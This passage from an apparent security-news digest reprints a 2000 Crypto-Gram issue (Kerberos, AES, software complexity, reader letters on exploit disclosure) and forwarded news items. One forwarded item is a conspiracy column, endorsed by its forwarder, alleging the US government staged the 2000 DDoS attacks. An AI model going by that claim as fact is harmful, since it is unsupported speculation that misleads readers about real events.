about its proprietary use of the field, they are harming interoperability and standardization. Other Kerberos vendors cannot directly support Windows 2000 clients. Even worse, Microsoft bypassed the IETF in this process (there's a procedure you're supposed follow if you want to enhance, deviate from, or modify an IETF standard). On the surface, this is just nasty business practices. If you're a company that has invested in a UNIX-based Kerberos authentication system and you want to support Windows 2000 desktops, your only real option is to buy a Windows 2000 Kerberos server and pay for the integration. I'm sure this is what Microsoft wants. My worry is more about the security. Protocols are very fragile; we've learned that time and time again. You can't just make changes to a security protocol and assume the changed protocol will be secure. Microsoft has taken the Kerberos protocol -- a published protocol that has gone through over a decade of peer review -- and has made changes in it that affect security. Even worse, they have made those changes in secret and have not released the details to the world. Don't be fooled. The Kerberos in Windows 2000 is not Kerberos. It does not conform to the Kerberos standard. It is Kerberos-like, but we don't know how secure it is. Kerberos Web page: IETF Specification: Microsoft Kerberos information: Windows 2000 Kerberos Authentication white paper -- Introduction to Windows 2000 Security Services -- Guide to Kerberos Interoperability -- Article by David Chappell about Kerberos and Windows 2000 -- ** *** ***** ******* *********** ************* Counterpane -- Featured Research "A Performance Comparison of the Five AES Finalists" B. Schneier and D. Whiting, Third AES Candidate Conference, 2000, to appear. In 1997, NIST announced a program to develop and choose an Advanced Encryption Standard (AES) to replace the aging Data Encryption Standard (DES). NIST chose five finalists in 1999. We compare the performance of the five AES finalists on a variety of common software platforms: current 32-bit CPUs (both large microprocessors and smaller, smart card and embedded microprocessors) and high-end 64-bit CPUs. Our intent is to show roughly how the algorithms' speeds compare across a variety of CPUs. Then, we give the maximum rounds cryptanalyzed for each of the algorithms, and re-examine all the performance numbers for these variants. We then compare the algorithms again, using the minimal secure variants as a way to more fairly align the security of the five algorithms. ** *** ***** ******* *********** ************* News More commentary on the ethics of publicizing vulnerabilities: An opinion on DDS attacks and the CD Universe fiasco: There's a new DSS standard: Text -- PDF -- BAIT, DIRT, and other law-enforcement hacker tools. Some of the PR fluff sounds too good to be true. H&R Block insecurity: The worst security product is the one that isn't used. Here are the results of a PGP usability study. Most people can't figure out how to use it. Some sent e-mail out unencrypted, believing it was secure. Novell published a "security flaw in MS Active Directory Services" the day before the MS launch of Windows 2000. Microsoft published a response shortly thereafter. Both documents are full of marketing spin. Russ Cooper has written an objective description of the non-issue: Good security software: a command-line tool for statically scanning C and C++ source code for security vulnerabilities. It's called ITS4. Mixter's paper on cracking: Excellent essay on the difference between hackers and vandals: Commentaries on distributed denial-of-service attacks: Usernames and passwords for sale: Sony PlayStation 2 is being held up for export (from Japan) due to crypto in the system: Navajo code-talking GI Joe doll: More speculation about Echelon: Interesting use of a honey pot by the San Diego Supercomputer Center (or, SDSC Hacks the Hackers): ** *** ***** ******* *********** ************* AES News The big AES news is the week of 10-14 April, 2000, in New York. Monday, Tuesday, and Wednesday are the 7th Fast Software Encryption workshop (FSE 2000). Thursday and Friday are the 3rd AES Candidate Conference (AES3). Both are in the New York Hilton and Towers. FSE 2000 will have several excellent papers on the AES candidates (new attacks on MARS, RC6, Rijndael, and Serpent), and AES3 will have nothing but. The papers for FSE 2000 have been selected, and are listed on the Web site. The papers for AES3 have not been announced yet. (The submission deadline for both conferences is long past.) Come, be a part of cryptography history. It'll be fun. FSE 2000: AES3: ** *** ***** ******* *********** ************* Counterpane Internet Security News Bruce Schneier was interviewed in Business Week: ** *** ***** ******* *********** ************* Software as a Burglary Tool This is a weird one. Two people in Minneapolis who allegedly stole information from their employers were charged with the possession of a "burglary tool" -- L0phtcrack, the program that automatically breaks Windows passwords. The ramifications of this are unclear. There are some burglary tools that you can't carry unless you are a licensed professional (certain lockpicking tooks, for example); just having them is illegal. But screwdrivers and bolt cutters can also be burglary tools if they are used with the intent to commit a crime. What it means to me is that the law is getting serious about this. ** *** ***** ******* *********** ************* The Doghouse: The Virginia Legislature They recently passed the Uniform Computer Information Transactions Act (UCITA). It's deeply disturbing. It could be subtitled "The Software Industry Wish List" for the amount of control (and absence of accountability) it gives UNDER LAW to software distributors. Under the UCITA, Microsoft not only doesn't have to fix any of the 63,000 Windows 2000 bugs, it wouldn't even have to tell you any of them existed. It could also disable the OS of anyone it wants for essentially any reason it wanted (e.g., failing to abide by the license terms which restrict you from any public mention of apparent bugs in the software). The governor has not signed the bill into law yet, but he is expected to. ** *** ***** ******* *********** ************* Software Complexity and Security The future of digital systems is complexity, and complexity is the worst enemy of security. Digital technology has been an unending series of innovations, unintended consequences, and surprises, and there's no reason to believe that will stop anytime soon. But there is one thing that has held constant through it all, and it's that digital systems have gotten more complicated. We've seen it over the past several years. Microprocessors have gotten more complex. Operating systems have gotten more complex. Computers have gotten more complex. Networks have gotten more complex. Individual networks have combined, further increasing the complexity. I've said it before, but it's worth repeating: The Internet is probably the most complex machine mankind has ever built. And it's not getting any simpler anytime soon. As a consumer, I think this complexity is great. There are more choices, more options, more things I can do. As a security professional, I think it's terrifying. Complexity is the worst enemy of security. This has been true since the beginning of computers, and is likely to be true for the foreseeable future. And as cyberspace continues to get more complex, it will continue to get less secure. There are several reasons why this is true. The first reason is the number of security bugs. All software contains bugs. And as the complexity of the software goes up, the number of bugs goes up. And a percentage of these bugs will affect security. The second reason is the modularity of complex systems. Complex systems are necessarily modular; there's no other way to handle the complexity than by breaking it up into manageable pieces. We could never have made the Internet as complex and interesting as it is today without modularity. But increased modularity means increased security flaws, because security often fails where two modules interact. We've already seen examples of this as everything becomes Internet-aware. For years we knew that Internet applications like sendmail and rlogin had to be secure, but the recent epidemic of macro viruses shows that Microsoft Word and Excel need to be secure. Java applets not only need to be secure for the uses they are intended, they also need to be secure for any other use an attacker might think of. Photocopiers, maintenance ports on routers, mass storage units: these can all be made Internet-aware, with the associated security risks. Rogue printer drivers can compromise Windows NT. Malicious e-mail attachments can tunnel through firewalls. Convenience features in Microsoft Outlook can compromise security. The third reason is the increased testing requirements for complex systems. I've talked elsewhere about security and failure testing. The only reasonable way to test the security of a system is to perform security evaluations on it. However, the more complex the system is, the harder a security evaluation becomes. A more complex system will have more security-related errors in the specification, design, and implementation. And unfortunately, the number of errors and the difficulty of evaluation does not grow in step with the complexity, but in fact grows much faster. For the sake of simplicity, let's assume the system has ten different settings, each with two possible choices. Then there are 45 different pairs of choices that could interact in unexpected ways, and 1024 different configurations altogether. Each possible interaction can lead to a security weakness, and must be explicitly tested. Now, assume that the system has twenty different settings. This means 190 different pairs of choices, and about a million different configurations. Thirty different settings means 435 different pairs and a billion different configurations. Even slight increases in the complexity of systems mean an explosion in the number of different configurations . . . any one of which could hide a security weakness. The increased number of possible interactions creates more work during the security evaluation. For a system with a moderate number of options, checking all the two-option interactions becomes a huge amount of work. Checking every possible configuration is effectively impossible. Thus the difficulty of performing security evaluations also grows very rapidly with increasing complexity. The combination of additional (potential) weaknesses and a more difficult security analysis unavoidably results in insecure systems. The fourth reason is that the more complex a system is, the harder it is to understand. There are all sorts of vulnerability points -- human-computer interface, system interactions -- that become much larger when you can't keep the entire system in your head. The fifth (and final) reason is the difficulty of analysis. The more complex a system is, the harder it is to do this kind of analysis. Everything is more complicated: the specification, the design, the implementation, the use. And as we've seen again and again, everything is relevant to security analysis. A more complex system loses on all fronts. It contains more weaknesses to start with, its modularity exacerbates those weaknesses, it's harder to test, it's harder to understand, and it's harder to analyze. It gets worse: This increase in the number of security weaknesses interacts destructively with the weakest-link property of security: the security of the overall system is limited by the security of its weakest link. Any single weakness can destroy the security of the entire system. Real systems show no signs of becoming less complex. In fact, they are becoming more complex faster and faster. Microsoft Windows is a poster child for this trend to complexity. Windows 3.1, released in 1992, had 3 million lines of code; Windows 95 has 15 million and Windows 98 has 18 million. The original Windows NT (also 1992) had 4 million lines of code; NT 4.0 (1996) has 16.5 million. In 1998, Windows NT 5.0 was estimated to have 20 million lines of code; by the time it was renamed Windows 2000 (in 1999) it had between 35 million and 60 million lines of code, depending on who you believe. (As points of comparison, Solaris has held pretty stable at about 7 to 8 million lines of code for the last few releases, and Linux, even with the addition of X Windows and Apache, is still under 5 million lines of code.) The size of Windows 2000 is absolutely amazing, and it will have more security bugs than Windows NT 4.0 and Windows 98 combined. In its defense, Microsoft has claimed that it spent 500 people-years to make Windows 2000 reliable. I only reprint this number because it will serve to illustrate how inadequate 500 people-years is. The networks of the future, necessarily more complex, will be less secure. The technology industry is driven by demand for features, for options, for speed. There are no standards for quality or security, and there is no liability for insecure software. Hence, there is no economic incentive to create high quality. Instead, there is an economic incentive to create the lowest quality the market will bear. And unless customers demand higher quality and better security, this will never change. I see two alternatives. The first is to recognize that the digital world will be one of ever-expanding features and options, of ever-faster product releases, of ever-increasing complexity, and of ever-decreasing security. This is the world we have today, and we can decide to embrace it knowingly. The other choice is to slow down, to simplify, and to try to add security. Customers won't demand this -- the issues are too complex for them to understand -- so a consumer advocacy group is required. I can easily imagine an FDA-like organization for the Internet, but it can take a decade to approve a new prescription drug for sale, so this solution might not be economically viable. I repeat: complexity is the worst enemy of security. Secure systems should be cut to the bone and made as simple as possible. There is no substitute for simplicity. Unfortunately, simplicity goes against everything our digital future stands for. ** *** ***** ******* *********** ************* Comments from Readers From: Shawn Hernan Subject: Full Disclosure I was intrigued by your recent series of editorials in Crypto-Gram regarding full-disclosure, and especially, CERT. I am writing to respond to the article. Some of your criticisms of CERT are valid, and I agree with them; but I wanted to point out a couple of things that you may not realize about our current practices. When deciding what to publish and when, we use a variety of different criteria. First, whatever we publish has to be *true* -- we go to great lengths to validate and verify everything we say in an advisory, and you can imagine some of the arguments that ensue over what is "true." Second, as a rule of thumb, our advisories are generally about very serious problems. We have a formal metric that we use to attempt to put vulnerabilities on a linear scale of "severity" and we use that as a first-order estimate of the gravity of the problem, and use our experience as the final judge. Generally, the problems issued in advisories are in the 90th percentile of this scale (internally called the "threat metric"). Third, although it may have been true in the past, it has never been the case in my time here (about 4 years now) that our publication schedule was dependent on all (or even any) of the fixes being available. We certainly prefer to have fixes available at publication time, but if we discover that a vulnerability is being exploited we will publish regardless of the availability of any fixes or patches. My team (the vulnerability handling team) works very closely on a daily basis with the incident response team to understand if a vulnerability is being exploited. Given all that, I am trying to find responsible, practical ways to publish more information about vulnerabilities in a variety of forms. We are a relatively small organization, and I'm not willing to sacrifice truth for expediency. From: Ryan Russell Subject: Distributing Exploits You're still not totally consistent in what you say: >Third, I believe that it is irresponsible, and possibly >criminal, to distribute exploits. You've already acknowledged that that's what it takes to get action. >Reverse-engineering security systems, discovering >vulnerabilities, and writing research papers about them >benefits research; it makes us smarter at designing secure >systems. Distributing exploits just make us more vulnerable. You acknowledge your behavior being inconsistent with your words, which is neither here nor there. It not only often takes an exploit, but it takes a press release sometimes. Thievco released an "exploit" to decode Netscape passwords a year and a half ago. Netscape did nothing. RST Corp. did the same, with a press release. That got Netscape's attention. >For example, Mixter is a German hacker who wrote the >Tribal Flood Network tool used in some of the distributed >denial-of-service attacks. I believe he has a lot to answer >for. His attack tool served no good. Not true. Were it not for him, we'd probably be looking at mystery tools that were being used that we didn't have the source for, and couldn't as easily analyze. Mixter has combated much FUD by showing us exactly the type of thing that can be used, so that the reporters couldn't run off and tell the public that the evil hackers have superweapons the security experts know nothing about. >It enabled criminals and cost a lot of companies a lot of >money. Its existence makes networks less secure. As you say, like any tool, it enables both good and bad guys. As you've pointed out, the security problem was already there, the tools just highlight it. Let me speak to the subtext of your rant against Mixter. Some people think Mixter may deserve some punishment. I don't, but I can see some of the logic. Really, I think if anyone deserves punishment, it's the guys who used the tool. Did Mixter and even the attackers actually do anything in the spirit of full disclosure? Yes. We've been complaining for years about the spoofing problem, and expecting ISPs to do filtering. Nothing has happened. Mixter put out his tool. Some meetings to discuss DDoS happened. No actual change to behavior, but there was some amount of advanced planning, which was good preparation. Finally, some person (yes, criminal) put their neck on the line and actually used them. They didn't take down the security sites to make them look bad. They didn't go after the government. They went after e-commerce, which I have to assume was designed for maximum reaction. I think we'll get some action now. From: Brian Bartholomew Subject: Publishing exploits > Second, I believe in giving the vendor advance notice. CERT took > this to an extreme, sometimes giving the vendor years to fix the > problem. I'd like to see the researcher tell the vendor that he > will publish the vulnerability in a month, or three weeks (no fair > giving the vendor just seven days to fix the problem). Hopefully > the vulnerability announcement can occur at the same time as the > patch announcement. This benefits everybody. Whatever CERT's motivations were, they had the effect of increasing user trust (because a new sheriff is in town) while decreasing trustability (because they sat on vulnerabilities users handed off to them). This is backwards, in two places. I prefer the following approach: announce existence of vulnerability and promise a kiddy script in a month; wait a month for vendor to react; publish kiddy script. > Publishing vulnerabilities in critical systems that cannot be easily > fixed and whose exploitation will cause serious harm (e.g., the air > traffic control system) is bad. Publishing is *very important* in these cases so the stakeholders know to reduce their trust in these systems. If air traffic control is vulnerable, tell me so I can stop taking airplanes! A non-life-safety version of this problem was the publishing of a script that gave an existing process root privileges using the memory debugger abilities of the console monitor ("L1-A") of a Sun. This debugger could be disabled, but nobody did because it disabled the software reset button. This reported vulnerability allowed users to adjust their trust of the security of root sharply downward, corresponding more closely to the actual security of it in practice. > Third, I believe that it is irresponsible, and possibly criminal, to > distribute exploits. This is gun control: "Don't punish murder, ban the gun instead! Exploits are an evil instrumentality! Exploits help a good boy go bad!" The right answer is: Humans are held responsible for their behavior. Guns, bricks, and exploits are just tools. From: Greg Guerin Subject: publicity attack loops? I have to admit that I was chuckling all the way through the Fernandes/Cryptonym letter in the Feb 2000 Crypto-Gram. Especially when at the end he wraps himself in the mantle of professional integrity. I've already written two essays on the Fernandes discovery and his downloadable "repair" ZIP: Though neither one is about Fernandes's professional integrity, per se, they do make a number of points about specific practices. To summarize the points (see the essays for the full explanation): 1) the ZIP held 2 EXE's, 2 DLL's, and 1 source file. 2) the downloadable ZIP had no digital signature. 3) nothing within the ZIP had a separate digital signature. 4) Fernandes's PGP key had no introducers at all. 5) no pointers to others who could vouch for points 2-4. 6) source was not compilable as supplied (missing header). Point 6 is only a little important because it means the EXE's must be trusted as given. But there was only one source file anyway, so you're already trusting the other EXE completely. And both DLL's must be trusted completely. Risk-wise, 75% blind trust is virtually identical to 100% blind trust, so it's not all that useful a distinction. It's like choosing whether to kill something 3 times over or 4 times -- correctly killing it once suffices. Note that at no point does "professional integrity" come into this, only "professional practice". I'm not disputing INTENT (integrity), I'm only describing OUTCOME (practice). Spotless integrity and intent cannot long survive avoidable errors in practice. By observing practices an observer might infer skill, integrity, or both, or neither. Those judgements, and the trustworthiness criteria underlying them, are left completely to the particular observer. All I can say is what I would infer from my observations, and why. You should draw your own conclusions, since my criteria for trustworthiness may differ from yours. But you should also invest in understanding why you came to those conclusions -- flaws in the process can lead you astray. From: "Rolf Oppliger" Subject: Distributed Denial-of-Service Attacks First of all, I'd like to congratulate you for your description and analysis of distributed denial-of-service (DDoS) attacks in the February issue of your Crypto-Gram newsletter. I fully agree with most of your statements, including your pessimistic view that all existing approaches to address the problem are unsatisfactory in one way or another. In your article, however, you also argue that "in the long term, out-of-band signaling is the only way to deal with many of the vulnerabilities of the Internet, DDS attacks among them." I don't agree with this statement. Any out-of-band signaling channel can also be subjected to DoS and DDoS attacks. I believe that the reason why telephone networks are not subjected to large-scale DoS and DDoS attacks is due to the fact that they address charging and billing, rather than their use of out-of-band signaling (out-of-band signaling has many advantages in other areas). Trying to establish a huge quantity of connections in a telephone network is simply too expensive ... I think that the lesson learnt from telephone networks is that packet-based charging and billing -- combined with adequate security mechanisms -- may be a viable solution to protect against large-scale DoS and DDoS attacks on the Internet (rather than out-of-band signaling). However, packet-based charging and billing also has many disadvantages, including, for example, a huge administration overhead. Consequently, I guess that packet-based charging and billing will not be applied on the Internet, and that "intelligent" packet-filtering performed by ISPs will be the major weapon to protect against large-scale DoS and DDoS attacks in the future. From: Ethan Benatan Subject: Defending Against DOS Attacks: Draining the Swamp If you'll pardon the musings of a biologist, I'd like to comment on your swamp analogy. I know you never stated so but it bears pointing out that swamps are not "bad" in any defensible sense, nor is draining them "good," even though doing so may have one immediate desirable consequence. I am sure that in your own field you can think of many examples where a cure, though effective, may have been worse than the disease. The RISK here is forgetting that in any complex system change comes at some cost; the more complex (or less well understood) the system, the harder it is to predict the cost. I think this applies to the Internet. It certainly applies to the natural world, in spades. I will not bore you with examples. From: pclites@cdsfulfillment.com Subject: deCCS In the February 2000 Crypto-Gram, you wrote: "An important point is that DVDs can be copied and pirated without using deCSS or any other decryption, which certainly makes the original claim of 'prevents piracy' look either astoundingly ignorant or brazenly deceptive." There is a sense in which the "prevents piracy" claim makes sense. deCSS makes it easy to copy the data on a DVD not just onto another DVD, but into another format, one which is easier to copy & transmit. In that sense, one could characterize it as making piracy easier. Kind of like the rationale behind the distinction between printed & electronic versions of source code in the original crypto export restrictions; but for a consumer data product, I think it's a more meaningful distinction. I would have to characterize the court's ruling as a correct application of a bad law, in what may turn out to be a watershed case. From: "Bryan Alexander" Subject: Secure Linux > The NSA has contracted with Secure Computing Corp. for > a secure version of Linux. Personally, I don't know if > the Linux license allows the NSA to make a secure version > of the operating system if they are not going to freely > distribute the results. Actually the GPL (Gnu Public License, which covers almost all parts of Linux) does allow this. There is no language in the license that requires that you redistribute anything based on the GPL, only what you are required to do *if* you redistribute a work based on the GPL. In addition, the GNU Project has said specifically that the license is not intended to prevent people from creating (without being forced to distribute) their own modified versions of GPLed software for their own use. The text of the GPL is located at: . A statement about being forced to distribute modified versions of software being an "unacceptable restriction" can be found at under the heading "Disrespect for Privacy." This is part of a discussion of the "fatal flaws" in the Apple APSL license. (I can't find the original source for the comment about this as it relates to the GPL right now, sorry.) ** *** ***** ******* *********** ************* CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety. CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on computer security and cryptography. Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/ Copyright (c) 2000 by Counterpane Internet Security, Inc. @HWA 219.0 ISN:Mar 18th:Microsoft fends off hackers with Windows 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [Moderator: Ugh, this is a load. A "syn-flood" is designed to drive up CPU usage? Windows 2k fended this 'hacker' attack off?] Forwarded From: "Noonan, Michael D" (courtesy of Paul Thurrott's WinInfo - http://www.wininformant.com) Microsoft fends off hackers with Windows 2000 In a controversial move sure to put the company square in the crosshairs of every hacker on the planet, Microsoft Corporation announced this week that it had successfully beaten off a "syn-flood" hacker attack Tuesday. As the Register's John Lettice notes, the company might have been better served by keeping the matter quiet. The attack, which is designed to bring a Web site to its knees by overloading processor capability, did little to slow down, let alone crash, the heavily clustered Microsoft Web site. The company says that it suffered only a 3-7% slowdown for a short period of time. "It was very minor, to be honest, so some people saw some slowdowns," said Microsoft spokesperson Adam Sohn. "We have a ton of overhead on this site. We can support terabytes and terabytes of downloads." The attack on Microsoft is the latest in a series of Web site attacks in recent weeks. Most of the previous attacks, which crippled Web sites such as Yahoo and eBay, were denial of service (DOS) attacks, which are designed to overload a Web server, making it incapable of serving actual users. Investigators have yet to pinpoint the culprits in the previous attacks. Microsoft says that it was able to determine where the attack on its Web site came from, however. The company alerted authorities and shut off their access to the company's Web site. Naturally, Microsoft credited Windows 2000 with saving the day. "The guys running the network swear to me that a year ago we would have been in big trouble, but with Windows 2000, nobody could knock our servers over," Sohn said. "Between the robustness of the OS and the security features built in, it really helped withstand the attack." Now doesn't that sound like a challenge? ISN is sponsored by Security-Focus.COM @HWA 220.0 ISN:Feds Behind Recent Massive Web Hacking/Fwd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2.23.00 Feds Behind Recent Massive Web Hacking/Fwd During the unprecedented massive blitz of hack-attacks which brought some of the world's most active websites to an utter standstill in the second week of February through implementation of DDoS (distributed denial of service) tactics, NewsHawk made a basic "call" on the situation. To whit: we postulated that the hack-attacks, implemented on a scale and to an extent previously unheard-of, were most likely carried out by spooky cyber-goon squads in the employ of our beloved federal government. Since I am by no stretch of anyone's imagination what could even remotely be considered a computer geek or wirehead, nor am I particularly strong on researching issues which don't directly concern me, I made my call on the scene, solicited and published opinions from our mailing list on the situation and pretty much left it at that. Well, it turns out I wasn't the ONLY one who was more than a little bit suspicious that feds may have had more than a little bit to do with the hacking blitz. Indeed, MacAddict columnist Rich Pizor outdid us by a mile and actually researched the background of the whole situation: in particular with respect to certain proposals for an "Internet Gestapo" kind of deal known as the Federal Investigation and Detection Network, or FIDNet, which the Clinton gang had just recently been advancing as a means of "patrolling" cyberspace. The deafening chorus of either boos, hisses or just plain silence from all quarters which greeted the Clintonistas' Brave New World-style proposal caused a retreat of sorts, but according to Pizor's view, most likely only a temporary one. Indeed, one just long enough for these gangstas and goons to lick their wounds and come up with a PLAN which would make everyone fall slavishly in line with their malignant (as usual) machinations and devious schemes. Namely; the initiation of the overwhelming hack-attack tidal wave and blitzkrieg which devastated the Web a couple of weeks ago. It's an old Machiavellian game. Create a previously non-existent problem, and then let everyone cry and beg for you to provide a solution. Sheesh. And you thought WE get out a limb with these kooky conspiracy scenarios. But seriously, we think Pizor is in fact ONE HUNDRED PERCENT correct in his suppositions. And what's REALLY interesting to us at NewsHawk, considering what we've put up with lately in terms of "mysteriously" missing or diverted emails and related malicious harassment, is the notice tacked on the end of Pizor's article, (which we've reprinted in full below): "We were unable to bring you this column at it's expected time and place in the Monday newsletter because our email server was having problems and our web site may have been under attack. COINCIDENCE?????" Uh... "coincidence? No f**king WAY! As Charlie Chan used to say: "too many coincidence, no longer a coincidence." Get the picture? =-=-=-= Trigger Man by Rich Pizor mon feb.23 A prevailing stereotype about the Internet is that it's full of crackpots hawking hair-brained conspiracy theories to anyone who will listen. Any responsible media outlet should consider it their job to present a solid, professional appearance in an attempt to countermand that stereotype. I'm therefore pleased to bring you a crackpot conspiracy theory of my own, which revealed itself to me when I connected the dots while reviewing the recent spate of Distributed Denial of Service (DDoS) attacks. Before we proceed any further, I must indulge in one act of contrition. I didn't want to go here. Really, I didn't. But companies and websites that no one's ever heard of are blaming every little outage or security flaw on the omni-present shadow of hackers, crackers, cyberterrorists and iSaboteurs. I feel then that it is my right -- nay, my solemn duty -- to correct the balance and proffer speculation (since that's all that any of this really is) as to what might have really happened. Our legal department also wants me to point out that neither myself, MacAddict.Com, or Imagine Media are necessarily making any formal allegations. That being said... In order to understand the elegance of what's going on here, we need to go back in time to the middle of last year. It all started with what the Clinton administration obviously assumed would be an innocuous and welcome announcement: Clinton had pushed forth a proposal for something called FIDNet, or the Federal Investigation and Detection Network. A controversial proposal to say the least, but the plan drew particular fire in late January as EPIC (among others) loudly denounced the plan, saying that it would lead to nothing more than an Orwellian information state. So Clinton (not uncharacteristically) backed down...just days before the first DDoS attack incapacitated Yahoo for a day, along with twelve other major sites over the course of the next week -- seven of which have come forth with reports. Suddenly everything became the fault of crackers. A man in Virginia was even inspired to launch his own DoS attack on the Virginia DMV website (he only used his own computer, so there was no Distributed nature to it). Certainly coincidental timing for a President who's trying to get an unreceptive public to go along with his draconian cybersecurity plan. Especially given Janet Reno's recent testimony before Congress regarding the need for formalized laws on Internet security, citing those very attacks as her justification. But it gets better. Two days after the first attack, the FBI held a press conference in which they vowed to catch the perpetrator(s) but also admitted that they didn't have any idea, at that time, who did it. "A 15-year-old kid could launch these attacks," said the Bureau's Ron Dick (with a name like that it's no wonder he wound up in the FBI). Only a few days later, the news bubbles out that they're hot on the trail of a suspect named "mafiaboy" -- surprise surprise, a 15-year-old kid, conveniently in Canada and out of the Feds' reach without cooperation from the Royal Canadian Mounted Police. Most in the hacking community scoff at the thought that "mafiaboy" could be involved in anything more than a copycat role. He's widely considered to be a "script kiddie" -- an amateur cracker seeking fame through his exploits using tools downloaded off the Internet. So it's puzzling that the Feds would want him that badly; the name "Lee Harvey Oswald" keeps coming to mind. It's also unclear why they want to find Mixter -- an anonymous German hacker who may have authored one or more of the tools that may have been involved -- when he has publicly stated that he didn't do it, and the tools he may have authored were never released publicly except with the intention of studying DDoS attacks and how to counter them. The only other lead that's been made public is an anonymous email sent to Attrition.org (a site that archives hacked Web pages) that even the site's webmaster isn't taking too seriously. Am I coming right out and saying that the government we elected is behind all of this? Not directly. I have a hard time seeing most elected officials even being able to use a word processor, let alone pull off something like this. But you have to admit, the timing of all of these events is mighty convenient -- and while it's unlikely that they could have done it themselves, all it takes is money and connections to arrange for someone to pull a trigger. It calls to mind Judd Hirsch's line from Independence Day: "Well you didn't *really* think they paid $500 for a hammer did you?" NOTE: We were unable to bring you this column at it's excepted time and place in the Monday newsletter because our email server was having problems and our web site may have been under attack. COINCIDENCE????? Rich Pizor is the pseudonym of the man who claims to be Online Content Editor for MacAddict.com -- if he told you any more than that, he'd have to kill you. When he isn't hatching looney theories like this one, Rich types inflammatory things in chat rooms in the hopes of gaining immortality in an Echelon log. ISN is sponsored by Security-Focus.COM @HWA 221.0 ISN:Hacker 'Gatsby' Gets 18-Month Sentence ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "John Q. Public" http://www.foxnews.com/vtech/030500/hack.sml Hacker 'Gatsby' Gets 18-Month Sentence 7.19 a.m. ET (1219 GMT) March 5, 2000 Associated Press FOOTNOTE: SAN DIEGO - A computer hacker known online as "The Gatsby" will spend 18 months in federal prison. A judge in San Diego has sentenced Jonathan Bosanac for electronically breaking into some of the country's largest computer systems. The judge said his wrongdoing caused more than $1 million in damage to one company alone. Bosanac was ordered to pay $10,000 in restitution to three telephone companies he hacked into. He pleaded guilty in December to participating in one of the nation's biggest hacking schemes. The crimes took place more than five years ago. Friends say the man's life has since turned around. He's been working as a computer consultant. ISN is sponsored by Security-Focus.COM @HWA 222.0 ISN:Naval officer in hot water over policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.defensenews.com/dtemp/gomez.html WASHINGTON - A U.S. Navy petty officer who engaged in a recent Internet discussion of network security issues has inadvertently sparked a major controversy regarding military operations security, and whether Pentagon policy has kept up with the Information Age. Operations security (OPSEC) is closely related to information operations. Its primary goal is to "force the adversary commander to make faulty decisions based upon insufficient information and/or to delay the decision making process due to a lack of information," according to the Pentagon's joint doctrine written in 1997. During the height of the Cold War, military members were warned not to discuss such seemingly harmless things as unit morale, readiness or upcoming training missions because bits of information can be pieced together to learn a great deal about military operations. The Pentagon in October ordered that all military Internet sites be scrubbed of personal or sensitive tactical information. Now the Navy is investigating actions taken by Gene Gomez, a petty officer second class aboard the USS Essex - actions some experts say may provide potential adversaries with sensitive technical information that could allow them to infiltrate military networks, or make Gomez and his family vulnerable to terrorist activity. While he is under investigation, the former network administrator has been denied access to the ship's networks, has had his shipboard electronic mail capabilities disabled, and had his separation of service papers placed on hold. Gomez refused to comment on the situation. "I want to ensure that I don't get into any more trouble," Gomez told Defense News. On Dec. 18, Gomez engaged in a discussion on an electronic mailing list organized by the computer security Internet site AntiOnline. The topic of the discussion was how to bypass some particular network security measures. In addition, he used his official electronic mailing address aboard the Essex, and signed his full name and rank. The e-mail caught the attention of Rick Forno, co-author of the book, "The Art of Information Warfare." Forno wrote and published on the Internet an article, "The Need for Common Sense, Not Only Technical Competence," blasting Gomez's actions. "Several aspects of [Gomez's] electronic mail messages are frightening, and should serve as a wake-up call to the military leadership regarding their perceived levels of OPSEC awareness throughout the military," Forno wrote. Forno conducted an Internet search on Gomez's name and found that earlier he had written to Happy Hacker Digest and to a group of so-called white hat hackers, the network security organization known as L0pht Heavy Industries. In these two separate messages, Gomez was seeking advice on how to disable some network functions he felt could be used to gain unauthorized access. Forno also found Gomez's personal Internet home page; a wealth of personal information; and information about the systems the sailor works with, including the Joint Maritime Command Information System, a strategic level command and control system. The article ignited a controversy, and led to a minor cyber war of words between Forno and Gomez and their respective supporters. The Pentagon effort to scrub Internet sites of such information did not address the issue of military members disclosing the same kind of information on non-military Internet sites. And Gomez is not the only military member using non-military Internet sites to disclose information that may not be allowed on military sites. Lt. Cmdr. Sheila Scarborough, executive officer aboard the USS Fort McHenry, for example, maintains a personal Internet site that offers details about her family, life aboard ship, and the ship's operations. Scarborough did not respond to Defense News questions mailed electronically. In addition, the Navy continues to provide daily Internet updates on the number of personnel on duty, the number of operational aircraft and ships, and the deployment status of the Fifth, Sixth and Seventh fleets. As of Jan. 3, the Navy listed 14 ships, 95 aircraft and 7,969 sailors and marines in the Persian Gulf. In an interview with Defense News, Forno downplayed the actual damage Gomez might have done to OPSEC, but said the situation "is indicative of the lack of online security awareness within the Department of Defense." In the aftermath of Gomez's alleged security violations, Forno and others now are calling for the Pentagon to take further steps to establish what should not be revealed by military members on non-military Web sites. "The Pentagon has not kept up with the Internet, despite being its parent. And yes, the Internet should be subject to OPSEC regulations, just as phones, radios, and message traffic is," said Ed Markin, a retired Navy pilot."Odds are the vast majority of senior military officers have no concept of what all transpires on the Internet." Susan Hansen, Pentagon spokeswoman, countered that the Pentagon already has taken steps to caution military members on use of the Web. "The current [OPSEC] directive was updated and signed out by Deputy Secretary John Hamre on Nov. 29. It does include a specific reference to the World Wide Web by stating that 'the Department of Defense maintains heightened awareness of potential threats of adversaries taking advantage of publicly available information and other detectable unclassified activities to derive indicators of U.S. intentions, capabilities, operations and activities'," Hansen said. The Navy's public affairs office did not respond by press time to 